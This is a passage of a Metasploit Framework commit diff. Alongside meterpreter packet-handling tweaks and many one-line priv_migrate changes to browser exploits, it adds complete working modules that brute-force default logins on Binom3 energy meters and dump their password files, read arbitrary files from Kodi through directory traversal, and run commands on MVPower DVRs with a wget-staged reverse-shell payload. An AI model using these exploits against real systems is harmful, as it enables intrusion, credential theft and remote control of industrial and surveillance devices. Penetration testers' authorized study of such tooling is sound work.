# TODO: cipher decryption
if (cipher)
end
# Deserialize the packet from the raw buffer
packet.from_r(self.raw)
# If we've finished reading the entire packet
if ((self.hdr_length_left == 0) &&
(self.payload_length_left == 0))
# TODO: cipher decryption
if (cipher)
end
# Deserialize the packet from the raw buffer
packet.from_r(self.raw)
# Reset our state
reset
return packet
# packet is complete!
in_progress = false
end
return packet, in_progress
end
protected

27
lib/rex/post/meterpreter/packet_response_waiter.rb
View File

@ -39,6 +39,9 @@ class PacketResponseWaiter
# @return [Integer] request ID to wait for
attr_accessor :rid
# @return [Boolean] indicates if part of the response has been received
attr_accessor :in_progress
#
# Initializes a response waiter instance for the supplied request
# identifier.
@ -46,6 +49,7 @@ class PacketResponseWaiter
def initialize(rid, completion_routine = nil, completion_param = nil)
self.rid = rid.dup
self.response = nil
self.in_progress = false
if (completion_routine)
self.completion_routine = completion_routine
@ -69,14 +73,21 @@ class PacketResponseWaiter
#
# @param response [Packet]
# @return [void]
def notify(response)
def notify(response, in_progress = false)
if (self.completion_routine)
self.response = response
self.completion_routine.call(response, self.completion_param)
self.in_progress = in_progress
unless in_progress
self.response = response
self.completion_routine.call(response, self.completion_param)
end
else
self.mutex.synchronize do
self.response = response
self.cond.signal
self.in_progress = in_progress
unless in_progress
# complete packet, ready for processing...
self.response = response
self.cond.signal
end
end
end
end
@ -92,7 +103,11 @@ class PacketResponseWaiter
interval = nil if interval and interval == -1
self.mutex.synchronize do
if self.response.nil?
self.cond.wait(self.mutex, interval)
loop do
self.cond.wait(self.mutex, interval)
break unless self.in_progress
self.in_progress = false
end
end
end
return self.response

4
metasploit-framework.gemspec
View File

@ -65,7 +65,7 @@ Gem::Specification.new do |spec|
# are needed when there's no database
spec.add_runtime_dependency 'metasploit-model'
# Needed for Meterpreter
spec.add_runtime_dependency 'metasploit-payloads', '1.2.14'
spec.add_runtime_dependency 'metasploit-payloads', '1.2.15'
# Needed for the next-generation POSIX Meterpreter
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.7'
# Needed by msfgui and other rpc components
@ -163,4 +163,6 @@ Gem::Specification.new do |spec|
spec.add_runtime_dependency 'openvas-omp'
# Needed by metasploit nessus bridge
spec.add_runtime_dependency 'nessus_rest'
# Nexpose Gem
spec.add_runtime_dependency 'nexpose'
end

7
modules/auxiliary/admin/http/nexpose_xxe_file_read.rb
View File

@ -4,7 +4,7 @@
##
require 'msf/core'
require 'rapid7/nexpose'
require 'nexpose'
class MetasploitModule < Msf::Auxiliary
@ -74,9 +74,10 @@ class MetasploitModule < Msf::Auxiliary
def run
user = datastore['USERNAME']
pass = datastore['PASSWORD']
trust_store = datastore['TRUST_STORE']
prot = ssl ? 'https' : 'http'
nsc = Nexpose::Connection.new(rhost, user, pass, rport)
nsc = Nexpose::Connection.new(rhost, user, pass, rport, nil, nil, trust_store)
print_status("Authenticating as: " << user)
begin
@ -140,7 +141,7 @@ class MetasploitModule < Msf::Auxiliary
print_status("Cleaning up")
begin
nsc.site_delete id
nsc.delete_site id
rescue
print_warning("Error while cleaning up site ID, manual cleanup required!")
end

208
modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb Normal file
View File

@ -0,0 +1,208 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info={})
super(update_info(info,
'Name' => 'Binom3 Web Management Login Scanner, Config and Password File Dump',
'Description' => %{
This module scans for Binom3 Multifunctional Revenue Energy Meter and Power Quality Analyzer
management login portal(s), and attempts to identify valid credentials.
There are four (4) default accounts - 'root'/'root', 'admin'/'1', 'alg'/'1', 'user'/'1'.
In addition to device config, 'root' user can also access password file.
Other users - admin, alg, user - can only access configuration file.
The module attempts to download configuration and password files depending on the login user credentials found.
},
'References' =>
[
['URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-031-01']
],
'Author' =>
[
'Karn Ganeshen <KarnGaneshen[at]gmail.com>'
],
'License' => MSF_LICENSE,
'DefaultOptions' => { 'VERBOSE' => true })
)
register_options(
[
Opt::RPORT(80), # Application may run on a different port too. Change port accordingly.
OptString.new('USERNAME', [false, 'A specific username to authenticate as', 'root']),
OptString.new('PASSWORD', [false, 'A specific password to authenticate with', 'root'])
], self.class
)
end
def run_host(ip)
unless is_app_binom3?
return
end
each_user_pass do |user, pass|
do_login(user, pass)
end
end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: opts[:service_name],
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)
login_data = {
last_attempted_at: Time.now,
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL,
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
#
# Check if App is Binom3
#
def is_app_binom3?
begin
res = send_request_cgi(
{
'uri' => '/',
'method' => 'GET'
}
)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
return false
end
if (res && res.code == 200 && res.headers['Server'] && (res.headers['Server'].include?('Team-R Web') || res.body.include?('binom_ico') || res.body.include?('team-r')))
print_good("#{rhost}:#{rport} - Binom3 confirmed...")
return true
else
print_error("#{rhost}:#{rport} - Application does not appear to be Binom3. Module will not continue.")
return false
end
end
#
# Brute-force the login page
#
def do_login(user, pass)
print_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}")
begin
res = send_request_cgi(
{
'uri' => '/~login',
'method' => 'POST',
'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' },
'vars_post' =>
{
'login' => user,
'password' => pass
}
}
)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
vprint_error("#{rhost}:#{rport} - HTTP Connection Failed...")
return :abort
end
if (res && res.code == 302 && res.get_cookies.include?('IDSESSION'))
print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
report_cred(
ip: rhost,
port: rport,
service_name: 'Binom3',
user: user,
password: pass
)
# Set Cookie
get_cookie = res.get_cookies
cookie = get_cookie + ' NO-HELP=true; onlyRu=1'
# Attempting to download config file
config_uri = '~cfg_ask_xml?type=cfg'
res = send_request_cgi({ 'method' => 'GET', 'uri' => config_uri, 'cookie' => cookie })
if res && res.code == 200
vprint_status('++++++++++++++++++++++++++++++++++++++')
vprint_status("#{rhost} - dumping configuration")
vprint_status('++++++++++++++++++++++++++++++++++++++')
print_good("#{rhost}:#{rport} - Configuration file retrieved successfully!")
path = store_loot(
'Binom3_config',
'text/xml',
rhost,
res.body,
rport,
'Binom3 device config'
)
print_status("#{rhost}:#{rport} - Configuration file saved in: #{path}")
else
print_error("#{rhost}:#{rport} - Failed to retrieve configuration")
return
end
# Attempt to dump password file
config_uri = '~cfg_ask_xml?type=passw'
res = send_request_cgi({ 'method' => 'GET', 'uri' => config_uri, 'cookie' => cookie })
if res && res.code == 200
vprint_status('++++++++++++++++++++++++++++++++++++++')
vprint_status("#{rhost} - dumping password file")
vprint_status('++++++++++++++++++++++++++++++++++++++')
print_good("#{rhost}:#{rport} - Password file retrieved successfully!")
path = store_loot(
'Binom3_passw',
'text/xml',
rhost,
res.body,
rport,
'Binom3 device config'
)
print_status("#{rhost}:#{rport} - Password file saved in: #{path}")
else
return
end
else
print_error("FAILED LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
end
end
end

84
modules/auxiliary/scanner/http/kodi_traversal.rb Normal file
View File

@ -0,0 +1,84 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'Kodi 17.0 Local File Inclusion Vulnerability',
'Description' => %q{
This module exploits a directory traversal flaw found in Kodi before 17.1.
},
'References' =>
[
['CVE', '2017-5982'],
],
'Author' =>
[
'Eric Flokstra', #Original
'jvoisin'
],
'License' => MSF_LICENSE,
'DisclosureDate' => "Feb 12 2017"
))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']),
OptString.new('FILE', [true, 'The file to obtain', '/etc/passwd']),
OptInt.new('DEPTH', [true, 'The max traversal depth to root directory', 10])
], self.class)
end
def run_host(ip)
base = normalize_uri(target_uri.path)
peer = "#{ip}:#{rport}"
print_status("Reading '#{datastore['FILE']}'")
traverse = '../' * datastore['DEPTH']
f = datastore['FILE']
f = f[1, f.length] if f =~ /^\//
f = "image/image://" + Rex::Text.uri_encode(traverse + f, "hex-all")
uri = normalize_uri(base, Rex::Text.uri_encode(f, "hex-all"))
res = send_request_cgi({
'method' => 'GET',
'uri' => uri
})
if res and res.code != 200
print_error("Unable to read '#{datastore['FILE']}', possibily because:")
print_error("\t1. File does not exist.")
print_error("\t2. No permission.")
elsif res and res.code == 200
data = res.body.lstrip
fname = datastore['FILE']
p = store_loot(
'kodi',
'application/octet-stream',
ip,
data,
fname
)
vprint_line(data)
print_good("#{fname} stored as '#{p}'")
else
print_error('Fail to obtain file for some unknown reason')
end
end
end

97
modules/exploits/linux/http/mvpower_dvr_shell_exec.rb Normal file
View File

@ -0,0 +1,97 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
HttpFingerprint = { :pattern => [ /JAWS\/1\.0/ ] }
def initialize(info = {})
super(update_info(info,
'Name' => 'MVPower DVR Shell Unauthenticated Command Execution',
'Description' => %q{
This module exploits an unauthenticated remote command execution
vulnerability in MVPower digital video recorders. The 'shell' file
on the web interface executes arbitrary operating system commands in
the query string.
This module was tested successfully on a MVPower model TV-7104HE with
firmware version 1.8.4 115215B9 (Build 2014/11/17).
The TV-7108HE model is also reportedly affected, but untested.
},
'Author' =>
[
'Paul Davies (UHF-Satcom)', # Initial vulnerability discovery and PoC
'Andrew Tierney (Pen Test Partners)', # Independent vulnerability discovery and PoC
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'References' =>
[
# Comment from Paul Davies contains probably the first published PoC
[ 'URL', 'https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/' ],
# Writeup with PoC by Andrew Tierney from Pen Test Partners
[ 'URL', 'https://www.pentestpartners.com/blog/pwning-cctv-cameras/' ]
],
'DisclosureDate' => 'Aug 23 2015',
'Privileged' => true, # BusyBox
'Arch' => ARCH_ARMLE,
'DefaultOptions' =>
{
'PAYLOAD' => 'linux/armle/mettle_reverse_tcp',
'CMDSTAGER::FLAVOR' => 'wget'
},
'Targets' =>
[
['Automatic', {}]
],
'CmdStagerFlavor' => %w{ echo printf wget },
'DefaultTarget' => 0))
end
def check
begin
fingerprint = Rex::Text::rand_text_alpha(rand(10) + 6)
res = send_request_cgi(
'uri' => "/shell?echo+#{fingerprint}",
'headers' => { 'Connection' => 'Keep-Alive' }
)
if res && res.body.include?(fingerprint)
return CheckCode::Vulnerable
end
rescue ::Rex::ConnectionError
return CheckCode::Unknown
end
CheckCode::Safe
end
def execute_command(cmd, opts)
begin
send_request_cgi(
'uri' => "/shell?#{Rex::Text.uri_encode(cmd, 'hex-all')}",
'headers' => { 'Connection' => 'Keep-Alive' }
)
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
def exploit
print_status("#{peer} - Connecting to target")
unless check == CheckCode::Vulnerable
fail_with(Failure::Unknown, "#{peer} - Target is not vulnerable")
end
print_good("#{peer} - Target is vulnerable!")
execute_cmdstager(linemax: 1500)
end
end

2
modules/exploits/windows/browser/adobe_cooltype_sing.rb
View File

@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
'EXITFUNC' => 'process',
'HTTP::compression' => 'gzip',
'HTTP::chunked' => true,
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Payload' =>
{

2
modules/exploits/windows/browser/adobe_flash_avm2.rb
View File

@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
'Retries' => false
},
'Platform' => 'win',

2
modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb
View File

@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
'Retries' => false,
'EXITFUNC' => "thread"
},

2
modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
View File

@ -56,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>

2
modules/exploits/windows/browser/adobe_flash_otf_font.rb
View File

@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>

2
modules/exploits/windows/browser/adobe_flash_regex_value.rb
View File

@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
'Retries' => false
},
'Platform' => 'win',

2
modules/exploits/windows/browser/adobe_flash_rtmp.rb
View File

@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>

2
modules/exploits/windows/browser/adobe_flash_sps.rb
View File

@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => "seh",
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>

2
modules/exploits/windows/browser/adobe_flashplayer_arrayindexing.rb
View File

@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
'EXITFUNC' => 'process',
'HTTP::compression' => 'gzip',
'HTTP::chunked' => true,
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Payload' =>
{

2
modules/exploits/windows/browser/adobe_flashplayer_avm.rb
View File

@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
'EXITFUNC' => 'process',
'HTTP::compression' => 'gzip',
'HTTP::chunked' => true,
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Payload' =>
{

2
modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
View File

@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => "process",
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Platform' => 'win',
'Targets' =>

2
modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb
View File

@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
'EXITFUNC' => 'process',
'HTTP::compression' => 'gzip',
'HTTP::chunked' => true,
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Payload' =>
{

2
modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb
View File

@ -28,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote
],
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Payload' =>
{

2
modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb
View File

@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'Retries' => false,
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'BrowserRequirements' =>
{

2
modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
View File

@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'BrowserRequirements' =>

2
modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb
View File

@ -50,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Payload' =>
{

2
modules/exploits/windows/browser/apple_quicktime_mime_type.rb
View File

@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Payload' =>
{

2
modules/exploits/windows/browser/apple_quicktime_rdrf.rb
View File

@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Privileged' => false,
'DisclosureDate' => "May 22 2013"

2
modules/exploits/windows/browser/apple_quicktime_smil_debug.rb
View File

@ -44,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Payload' =>
{

2
modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
View File

@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Payload' =>
{

2
modules/exploits/windows/browser/asus_net4switch_ipswcom.rb
View File

@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => "seh",
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Platform' => 'win',
'Targets' =>

2
modules/exploits/windows/browser/aventail_epi_activex.rb
View File

@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Payload' =>
{

2
modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
View File

@ -50,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
],
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Payload' =>
{

2
modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
View File

@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => "none",
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Payload' =>
{

2
modules/exploits/windows/browser/cisco_playerpt_setsource.rb
View File

@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Payload' =>
{

2
modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb
View File

@ -52,7 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Payload' =>
{

2
modules/exploits/windows/browser/citrix_gateway_actx.rb
View File

@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Payload' =>
{

2
modules/exploits/windows/browser/clear_quest_cqole.rb
View File

@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>

2
modules/exploits/windows/browser/crystal_reports_printcontrol.rb
View File

@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>

2
modules/exploits/windows/browser/dell_webcam_crazytalk.rb
View File

@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => "seh",
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>

2
modules/exploits/windows/browser/enjoysapgui_comp_download.rb
View File

@ -28,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote
],
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Payload' =>
{

2
modules/exploits/windows/browser/firefox_smil_uaf.rb
View File

@ -45,7 +45,7 @@ require 'msf/core'
'DefaultOptions' =>
{
'EXITFUNC' => "thread",
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'References' =>
[

2
modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb
View File

@ -44,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => "process",
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>

2
modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb
View File

@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f -k'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>

2
modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb
View File

@ -55,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>

2
modules/exploits/windows/browser/hp_easy_printer_care_xmlcachemgr.rb
View File

@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
],
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Payload' =>
{

2
modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb
View File

@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
],
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Payload' =>
{

2
modules/exploits/windows/browser/hyleos_chemviewx_activex.rb
View File

@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Payload' =>
{

2
modules/exploits/windows/browser/ibm_spss_c1sizer.rb
View File

@ -56,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>

2
modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb
View File

@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>

2
modules/exploits/windows/browser/ie_cbutton_uaf.rb
View File

@ -63,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>

2
modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
View File

@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>

2
modules/exploits/windows/browser/ie_execcommand_uaf.rb
View File

@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Platform' => 'win',
'Targets' =>

2
modules/exploits/windows/browser/ie_setmousecapture_uaf.rb
View File

@ -84,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'PrependMigrate' => true,
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Privileged' => false,
'DisclosureDate' => "Sep 17 2013",

2
modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb
View File

@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => false,
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Payload' =>
{

2
modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb
View File

@ -57,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>

2
modules/exploits/windows/browser/inotes_dwa85w_bof.rb
View File

@ -61,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>

2
modules/exploits/windows/browser/intrust_annotatex_add.rb
View File

@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Payload' =>
{

2
modules/exploits/windows/browser/java_docbase_bof.rb
View File

@ -58,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Payload' =>
{

2
modules/exploits/windows/browser/java_mixer_sequencer.rb
View File

@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => "process",
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Platform' => 'win',
'Targets' =>

2
modules/exploits/windows/browser/mcafee_mvt_exec.rb
View File

@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => "none",
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>

2
modules/exploits/windows/browser/mozilla_attribchildremoved.rb
View File

@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f'
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Payload' =>
{

2
modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb
View File

@ -44,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
